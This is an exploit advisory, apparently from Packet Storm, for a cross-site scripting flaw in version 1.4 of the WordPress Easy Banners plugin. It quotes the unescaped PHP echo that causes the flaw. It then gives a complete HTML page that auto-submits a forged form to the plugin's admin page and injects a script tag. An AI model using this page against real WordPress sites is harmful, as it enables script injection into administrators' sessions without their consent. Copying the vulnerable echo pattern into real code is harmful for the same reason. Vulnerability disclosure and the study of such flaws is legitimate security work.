WordPress Easy Banners plugin version 1.4 suffers from a cross site scripting vulnerability.
028ce6555feac11a21c6a4c716b8bef856667894d5c2bd4171b89e010e8711c5######################
# Exploit Title : Wordpress easy-banners.1.4 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/
# Software Link : http://downloads.wordpress.org/plugin/easy-banners.1.4.zip
# Date : 2014-06-28
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location :
http://localhost/wp-admin/options-general.php?page=easy-banners.php
######################
# Vulnerable code :
<input type="hidden" name="name" id="name" value="<?php echo
$row['name']; ?>" />
######################
Exploit Code:
<html>
<body>
<form name="form1" method="post"
action="http://localhost/wp-admin/options-general.php?page=easy-banners.php">
<table class="widefat" style="width: 50%;">
<input type="hidden" name="name" id="name" size="55" maxlength="250"
value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
</form>
</body>
</html>
#####################
Discovered By : ACC3SS
#####################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed